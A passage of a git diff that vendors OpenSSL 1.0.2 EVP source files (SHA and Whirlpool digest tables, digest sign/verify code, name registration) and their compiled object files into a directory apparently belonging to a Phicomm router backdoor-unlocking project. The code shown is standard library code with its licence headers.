+# include <openssl/evp.h>
+# include <openssl/objects.h>
+# include <openssl/sha.h>
+# ifndef OPENSSL_NO_RSA
+#  include <openssl/rsa.h>
+# endif
+
+static int init(EVP_MD_CTX *ctx)
+{
+    return SHA1_Init(ctx->md_data);
+}
+
+static int update(EVP_MD_CTX *ctx, const void *data, size_t count)
+{
+    return SHA1_Update(ctx->md_data, data, count);
+}
+
+static int final(EVP_MD_CTX *ctx, unsigned char *md)
+{
+    return SHA1_Final(md, ctx->md_data);
+}
+
+static const EVP_MD sha1_md = {
+    NID_sha1,
+    NID_sha1WithRSAEncryption,
+    SHA_DIGEST_LENGTH,
+    EVP_MD_FLAG_PKEY_METHOD_SIGNATURE | EVP_MD_FLAG_DIGALGID_ABSENT,
+    init,
+    update,
+    final,
+    NULL,
+    NULL,
+    EVP_PKEY_RSA_method,
+    SHA_CBLOCK,
+    sizeof(EVP_MD *) + sizeof(SHA_CTX),
+};
+
+const EVP_MD *EVP_sha1(void)
+{
+    return (&sha1_md);
+}
+#endif
+
+#ifndef OPENSSL_NO_SHA256
+static int init224(EVP_MD_CTX *ctx)
+{
+    return SHA224_Init(ctx->md_data);
+}
+
+static int init256(EVP_MD_CTX *ctx)
+{
+    return SHA256_Init(ctx->md_data);
+}
+
+/*
+ * Even though there're separate SHA224_[Update|Final], we call
+ * SHA256 functions even in SHA224 context. This is what happens
+ * there anyway, so we can spare few CPU cycles:-)
+ */
+static int update256(EVP_MD_CTX *ctx, const void *data, size_t count)
+{
+    return SHA256_Update(ctx->md_data, data, count);
+}
+
+static int final256(EVP_MD_CTX *ctx, unsigned char *md)
+{
+    return SHA256_Final(md, ctx->md_data);
+}
+
+static const EVP_MD sha224_md = {
+    NID_sha224,
+    NID_sha224WithRSAEncryption,
+    SHA224_DIGEST_LENGTH,
+    EVP_MD_FLAG_PKEY_METHOD_SIGNATURE | EVP_MD_FLAG_DIGALGID_ABSENT,
+    init224,
+    update256,
+    final256,
+    NULL,
+    NULL,
+    EVP_PKEY_RSA_method,
+    SHA256_CBLOCK,
+    sizeof(EVP_MD *) + sizeof(SHA256_CTX),
+};
+
+const EVP_MD *EVP_sha224(void)
+{
+    return (&sha224_md);
+}
+
+static const EVP_MD sha256_md = {
+    NID_sha256,
+    NID_sha256WithRSAEncryption,
+    SHA256_DIGEST_LENGTH,
+    EVP_MD_FLAG_PKEY_METHOD_SIGNATURE | EVP_MD_FLAG_DIGALGID_ABSENT,
+    init256,
+    update256,
+    final256,
+    NULL,
+    NULL,
+    EVP_PKEY_RSA_method,
+    SHA256_CBLOCK,
+    sizeof(EVP_MD *) + sizeof(SHA256_CTX),
+};
+
+const EVP_MD *EVP_sha256(void)
+{
+    return (&sha256_md);
+}
+#endif                          /* ifndef OPENSSL_NO_SHA256 */
+
+#ifndef OPENSSL_NO_SHA512
+static int init384(EVP_MD_CTX *ctx)
+{
+    return SHA384_Init(ctx->md_data);
+}
+
+static int init512(EVP_MD_CTX *ctx)
+{
+    return SHA512_Init(ctx->md_data);
+}
+
+/* See comment in SHA224/256 section */
+static int update512(EVP_MD_CTX *ctx, const void *data, size_t count)
+{
+    return SHA512_Update(ctx->md_data, data, count);
+}
+
+static int final512(EVP_MD_CTX *ctx, unsigned char *md)
+{
+    return SHA512_Final(md, ctx->md_data);
+}
+
+static const EVP_MD sha384_md = {
+    NID_sha384,
+    NID_sha384WithRSAEncryption,
+    SHA384_DIGEST_LENGTH,
+    EVP_MD_FLAG_PKEY_METHOD_SIGNATURE | EVP_MD_FLAG_DIGALGID_ABSENT,
+    init384,
+    update512,
+    final512,
+    NULL,
+    NULL,
+    EVP_PKEY_RSA_method,
+    SHA512_CBLOCK,
+    sizeof(EVP_MD *) + sizeof(SHA512_CTX),
+};
+
+const EVP_MD *EVP_sha384(void)
+{
+    return (&sha384_md);
+}
+
+static const EVP_MD sha512_md = {
+    NID_sha512,
+    NID_sha512WithRSAEncryption,
+    SHA512_DIGEST_LENGTH,
+    EVP_MD_FLAG_PKEY_METHOD_SIGNATURE | EVP_MD_FLAG_DIGALGID_ABSENT,
+    init512,
+    update512,
+    final512,
+    NULL,
+    NULL,
+    EVP_PKEY_RSA_method,
+    SHA512_CBLOCK,
+    sizeof(EVP_MD *) + sizeof(SHA512_CTX),
+};
+
+const EVP_MD *EVP_sha512(void)
+{
+    return (&sha512_md);
+}
+#endif                          /* ifndef OPENSSL_NO_SHA512 */
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/m_sha1.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/m_sha1.o
new file mode 100644
index 0000000000000000000000000000000000000000..d95c03aec6e44880a0ab387b1b25fa4e8e582962
GIT binary patch
literal 5256
zcmchaO=w(I6vyvmT9ZoJ#4j4GtxsDeMe~|TlQfFxOJkA=jIAV1i6RV>Wb&bz$uM~-
zlOk<EK}!*exX8k4S~p$Tm2L#VKoKIiP!Mq=xNuQ-6&Dr>)boGuoSEB`_ZE%B1845J
zzk5FJyZ65L=AG})4AdnOMkHZgG_{^kW7eB%wilS5X)=4vUrh)88M<&gec|t+i=~!7
zFangmcs{0cPtJFx*?MI9gPoYzjbLW?U{lQ1I%7T|^^kz1F>JQ{dmlwUq@tIp|C?gc
zy+XAwleRPXzw573?T<;FZLIH6?h5DE&1Y2mQ_{zHU^}kgqug=zG1g1^Fezla>d%Df
zYrlhiea}0sqvMN3f6;l)J?gf%rH(BI-PE~`cDKFraEQZ@9n|0!#X%oDF=}YZ*1(da
z5Sf4C?665xniKmP>l-f7jgA;uTRE3ta^7|$m;~(Qz%s^WW6bQ>xd^}I2=-9~yT;7U
z_jQEd4-xG52zHy9>>IA5ksok2b0S!01WPN%={GfS+hP8^vuS`pGV%!vF1vMiRFX1j
zxt~CtmB(H$aOull?PY(56A8!O!@rHW#688_V=n$jn7^X<G3Ku;{u1+P=8`|n{H*dH
zX8xYy$cuUEGc!&+fm2Th9wPVgn`DD8^L`2UnbTk(!q16+h^u+tXU@3F(N6|<n~c=j
zq-m&iEGubtS-qN>G}z6}k~H<3;D<zThPB|niQ-?x@NZ)HcQO3u7>;``s_v~Az7fNB
z(SAhb*&D+T#_%J=AEeE_LUkZ=kM}UY9^xwRWB!%mCzyY$_-o96RD6<n)cgxE+!V44
zGr5#IVWwt_xjC~~n#}omGh3YXL(<XJ%@7uNM@MJaQa=dlN_DUcEVvx)30=@f`fOnm
zEk%me)y)>UvPI6YvV)nE$9pr`lLG@I{im|0dXH!Nvt}gSo5~IZQw+?}aGrrZgvpXc
z6Rf$QQ*%OP+f8iLtY$^07J`Y{Zh_r@`qf~)3>#PrF=;v2#O1Sz6&N1r%`VJN7X#x=
zzC1g%WN@EA@VIz{bc6N>@@3dm`P<Cb6vz36d>=M7fA0UH_{N=3nwaBBzK>Kmp1%-q
z*uoD3l7R0g75)Ms3HSk0;X{BV;E$6EKMhC%?vM(fAR7Yy1gY>dfF$5gk_vwZkOcf7
zsqjmHB;bcgg<l3F0mr*Ucncs2mKS><&vS=th;Vr?w1&9K<vrqA{28{<q%Hoe#aAqj
zy7GQmRb1-IIg$BD-8IYKuDfn=yKV~-kVqc9#~_a4UO<g$Rb1Z7p2h9D@_z)wcHI@r
zAJ;4I>s7_2?lr}w?wZBzy6YCV>$ad635H=hq!34O`5(}#c<616XK}l3+TwOyhXXOp
zE&=IOT<Xd>5r2pM-cbIs4kg7s?!T+Jth1aq$uIl<x$@WNO8n&<{-pfn+}>1N?xPLG
zuW-Ma_e=6$XMRX=c@N@!2@!vJ4`vjX_n>hXmI{7uoLavewliXt^K&`Z&sTio(n~I9
z-0_74;|3IcSZ;aVxD)e*LcT~|#d$yP(pOB|f}fjsi~G~XMYmL*FXhYr5=ZA}vQy<;
zAs<flKm9rsjZ4G#xh)=dezhUlybM)}XF8sBUX_H#E&gk_%mIyrVK%UzJP)5{uD<~G
z>p~o-G42KA+-iJxOnrw7Rd5h2aV#5ViZtr_OSoW?F^)%fC#k;vK4K`<PHM{vUy%I_
zz_?t$v>A)p@i+8>@SwzrFYfz#QgxYTo#P#G<W}Y{*e3%yb^J|^A5#T&{5-`*t>5~d
zu);FOWBqWXBwo%>RBc3hSZtCWBq!NT`Y5T6$CpXeQdKZOQc?3)UGo6>M8&81Pcgo)
IY|-)m0*cMZLI3~&

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/m_sigver.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/m_sigver.c
new file mode 100644
index 0000000..4492d20
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/m_sigver.c
@@ -0,0 +1,203 @@
+/* m_sigver.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 2006.
+ */
+/* ====================================================================
+ * Copyright (c) 2006,2007 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/evp.h>
+#include <openssl/objects.h>
+#include <openssl/x509.h>
+#include "evp_locl.h"
+
+static int do_sigver_init(EVP_MD_CTX *ctx, EVP_PKEY_CTX **pctx,
+                          const EVP_MD *type, ENGINE *e, EVP_PKEY *pkey,
+                          int ver)
+{
+    if (ctx->pctx == NULL)
+        ctx->pctx = EVP_PKEY_CTX_new(pkey, e);
+    if (ctx->pctx == NULL)
+        return 0;
+
+    if (!(ctx->pctx->pmeth->flags & EVP_PKEY_FLAG_SIGCTX_CUSTOM)) {
+
+        if (type == NULL) {
+            int def_nid;
+            if (EVP_PKEY_get_default_digest_nid(pkey, &def_nid) > 0)
+                type = EVP_get_digestbynid(def_nid);
+        }
+
+        if (type == NULL) {
+            EVPerr(EVP_F_DO_SIGVER_INIT, EVP_R_NO_DEFAULT_DIGEST);
+            return 0;
+        }
+    }
+
+    if (ver) {
+        if (ctx->pctx->pmeth->verifyctx_init) {
+            if (ctx->pctx->pmeth->verifyctx_init(ctx->pctx, ctx) <= 0)
+                return 0;
+            ctx->pctx->operation = EVP_PKEY_OP_VERIFYCTX;
+        } else if (EVP_PKEY_verify_init(ctx->pctx) <= 0)
+            return 0;
+    } else {
+        if (ctx->pctx->pmeth->signctx_init) {
+            if (ctx->pctx->pmeth->signctx_init(ctx->pctx, ctx) <= 0)
+                return 0;
+            ctx->pctx->operation = EVP_PKEY_OP_SIGNCTX;
+        } else if (EVP_PKEY_sign_init(ctx->pctx) <= 0)
+            return 0;
+    }
+    if (EVP_PKEY_CTX_set_signature_md(ctx->pctx, type) <= 0)
+        return 0;
+    if (pctx)
+        *pctx = ctx->pctx;
+    if (ctx->pctx->pmeth->flags & EVP_PKEY_FLAG_SIGCTX_CUSTOM)
+        return 1;
+    if (!EVP_DigestInit_ex(ctx, type, e))
+        return 0;
+    return 1;
+}
+
+int EVP_DigestSignInit(EVP_MD_CTX *ctx, EVP_PKEY_CTX **pctx,
+                       const EVP_MD *type, ENGINE *e, EVP_PKEY *pkey)
+{
+    return do_sigver_init(ctx, pctx, type, e, pkey, 0);
+}
+
+int EVP_DigestVerifyInit(EVP_MD_CTX *ctx, EVP_PKEY_CTX **pctx,
+                         const EVP_MD *type, ENGINE *e, EVP_PKEY *pkey)
+{
+    return do_sigver_init(ctx, pctx, type, e, pkey, 1);
+}
+
+int EVP_DigestSignFinal(EVP_MD_CTX *ctx, unsigned char *sigret,
+                        size_t *siglen)
+{
+    int sctx, r = 0;
+    EVP_PKEY_CTX *pctx = ctx->pctx;
+    if (pctx->pmeth->flags & EVP_PKEY_FLAG_SIGCTX_CUSTOM) {
+        EVP_PKEY_CTX *dctx;
+        if (!sigret)
+            return pctx->pmeth->signctx(pctx, sigret, siglen, ctx);
+        dctx = EVP_PKEY_CTX_dup(ctx->pctx);
+        if (!dctx)
+            return 0;
+        r = dctx->pmeth->signctx(dctx, sigret, siglen, ctx);
+        EVP_PKEY_CTX_free(dctx);
+        return r;
+    }
+    if (pctx->pmeth->signctx)
+        sctx = 1;
+    else
+        sctx = 0;
+    if (sigret) {
+        EVP_MD_CTX tmp_ctx;
+        unsigned char md[EVP_MAX_MD_SIZE];
+        unsigned int mdlen;
+        EVP_MD_CTX_init(&tmp_ctx);
+        if (!EVP_MD_CTX_copy_ex(&tmp_ctx, ctx))
+            return 0;
+        if (sctx)
+            r = tmp_ctx.pctx->pmeth->signctx(tmp_ctx.pctx,
+                                             sigret, siglen, &tmp_ctx);
+        else
+            r = EVP_DigestFinal_ex(&tmp_ctx, md, &mdlen);
+        EVP_MD_CTX_cleanup(&tmp_ctx);
+        if (sctx || !r)
+            return r;
+        if (EVP_PKEY_sign(ctx->pctx, sigret, siglen, md, mdlen) <= 0)
+            return 0;
+    } else {
+        if (sctx) {
+            if (pctx->pmeth->signctx(pctx, sigret, siglen, ctx) <= 0)
+                return 0;
+        } else {
+            int s = EVP_MD_size(ctx->digest);
+            if (s < 0 || EVP_PKEY_sign(pctx, sigret, siglen, NULL, s) <= 0)
+                return 0;
+        }
+    }
+    return 1;
+}
+
+int EVP_DigestVerifyFinal(EVP_MD_CTX *ctx, const unsigned char *sig,
+                          size_t siglen)
+{
+    EVP_MD_CTX tmp_ctx;
+    unsigned char md[EVP_MAX_MD_SIZE];
+    int r;
+    unsigned int mdlen;
+    int vctx;
+
+    if (ctx->pctx->pmeth->verifyctx)
+        vctx = 1;
+    else
+        vctx = 0;
+    EVP_MD_CTX_init(&tmp_ctx);
+    if (!EVP_MD_CTX_copy_ex(&tmp_ctx, ctx))
+        return -1;
+    if (vctx) {
+        r = tmp_ctx.pctx->pmeth->verifyctx(tmp_ctx.pctx,
+                                           sig, siglen, &tmp_ctx);
+    } else
+        r = EVP_DigestFinal_ex(&tmp_ctx, md, &mdlen);
+    EVP_MD_CTX_cleanup(&tmp_ctx);
+    if (vctx || !r)
+        return r;
+    return EVP_PKEY_verify(ctx->pctx, sig, siglen, md, mdlen);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/m_sigver.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/m_sigver.o
new file mode 100644
index 0000000000000000000000000000000000000000..e17b2553c5757c62bb2a2541b5217f23e8239579
GIT binary patch
literal 4504
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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/m_wp.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/m_wp.c
new file mode 100644
index 0000000..a890939
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/m_wp.c
@@ -0,0 +1,48 @@
+/* crypto/evp/m_wp.c */
+
+#include <stdio.h>
+#include "cryptlib.h"
+
+#ifndef OPENSSL_NO_WHIRLPOOL
+
+# include <openssl/evp.h>
+# include <openssl/objects.h>
+# include <openssl/x509.h>
+# include <openssl/whrlpool.h>
+# include "evp_locl.h"
+
+static int init(EVP_MD_CTX *ctx)
+{
+    return WHIRLPOOL_Init(ctx->md_data);
+}
+
+static int update(EVP_MD_CTX *ctx, const void *data, size_t count)
+{
+    return WHIRLPOOL_Update(ctx->md_data, data, count);
+}
+
+static int final(EVP_MD_CTX *ctx, unsigned char *md)
+{
+    return WHIRLPOOL_Final(md, ctx->md_data);
+}
+
+static const EVP_MD whirlpool_md = {
+    NID_whirlpool,
+    0,
+    WHIRLPOOL_DIGEST_LENGTH,
+    0,
+    init,
+    update,
+    final,
+    NULL,
+    NULL,
+    EVP_PKEY_NULL_method,
+    WHIRLPOOL_BBLOCK / 8,
+    sizeof(EVP_MD *) + sizeof(WHIRLPOOL_CTX),
+};
+
+const EVP_MD *EVP_whirlpool(void)
+{
+    return (&whirlpool_md);
+}
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/m_wp.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/m_wp.o
new file mode 100644
index 0000000000000000000000000000000000000000..f915b0bbf01a1b2b391fdceccf5bf7a04068e34d
GIT binary patch
literal 2376
zcmcJQ-D(q25XWbmYOD0iFDO=ILD3fNl4?;ZC~0fb1fnUm)n16(O}aI~Y&L8*G_7F0
z@WN6AAHhfHBM9F3Dqe~g77^;q?o6^h-P|Y+Z2mL9Ju~MsXLr*1Opm64m<A7^6A1-)
zf1=~30yhQ2Fa$q_FaOHz9%Ofa=Jx8N-{=jY?A}hd;6qU9OHc#gY9e$}9RClY+WTtZ
zh57k=`uIw*S@WCvjB(pYPEOrz2I173TS+51JrUwCu@_|o9~%6^;}z%u_)Lt459iS*
z)3%pDYmI1Q1AYA;aUm(^Qt$@g94oOT`-2hoFovx%8({4wv}e8W{V?u*B6de<>@xbJ
zSqZG9T0erGNFABW5OaxTJ{OqlsAR$~qOS$37+`3H68t72Jc4nQ)cbKuz^UU9NdiuH
z;eE&WbtJSOs@+Er#~*d!FS>9C`B|LtBq~{ZA02bEZj@l7QnRYitgl<X4V7BOhs|=u
ztJYn&YC7v+F60Yyvw5?S$vjCfo6ECv`Lqeovbm-FVxf>XGeLSMUI`0zK#oeLpDvp1
zvf((UL!omVtm5y((1w}Q2_Rp%oMGa$F2X0!CnJ6aAK{|}(db-KA38o{dhpxfa&E>I
z&SASf)u2Z#I)36(C(8|_z0UD-h0A_`(b#f)tBC4*p_aw-?5bt>cFP9?x5omb*l2(e
zP>RVjJlCkYCEP-z<T{RB!?rcow+*}_CL6w0dd2a}TGOa|Zr%3$Ev{jg%?;0TY#!Oa
ziH_;C)+d!RDUN3pPHm$$h5_wiDhkm*;45N{Ih|k1m4Bq{^EKw`jk3jgs;K?n<eGn*
zf2T|TZ@J^>Jwr%mE;5Bq-27JwqRF|U`O`N*oqrA)%}MTcbOSqJy}>FX^A}yh7vf7B
z(kpQ=rfm@!-EMU5qc+a@dK98B;}^V*4mDNtvz%X+hOBCS6M5YFed6_7<2+hFx}7Co
x&QDz5l(NtLe`Os+M&BGYpS}d@*+B#?hOa4z7?*1ky1U}?<&*TT-7<94{6FI{wo(89

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/names.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/names.c
new file mode 100644
index 0000000..ff115a3
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/names.c
@@ -0,0 +1,215 @@
+/* crypto/evp/names.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/evp.h>
+#include <openssl/objects.h>
+#include <openssl/x509.h>
+
+int EVP_add_cipher(const EVP_CIPHER *c)
+{
+    int r;
+
+    if (c == NULL)
+        return 0;
+
+    OPENSSL_init();
+
+    r = OBJ_NAME_add(OBJ_nid2sn(c->nid), OBJ_NAME_TYPE_CIPHER_METH,
+                     (const char *)c);
+    if (r == 0)
+        return (0);
+    check_defer(c->nid);
+    r = OBJ_NAME_add(OBJ_nid2ln(c->nid), OBJ_NAME_TYPE_CIPHER_METH,
+                     (const char *)c);
+    return (r);
+}
+
+int EVP_add_digest(const EVP_MD *md)
+{
+    int r;
+    const char *name;
+    OPENSSL_init();
+
+    name = OBJ_nid2sn(md->type);
+    r = OBJ_NAME_add(name, OBJ_NAME_TYPE_MD_METH, (const char *)md);
+    if (r == 0)
+        return (0);
+    check_defer(md->type);
+    r = OBJ_NAME_add(OBJ_nid2ln(md->type), OBJ_NAME_TYPE_MD_METH,
+                     (const char *)md);
+    if (r == 0)
+        return (0);
+
+    if (md->pkey_type && md->type != md->pkey_type) {
+        r = OBJ_NAME_add(OBJ_nid2sn(md->pkey_type),
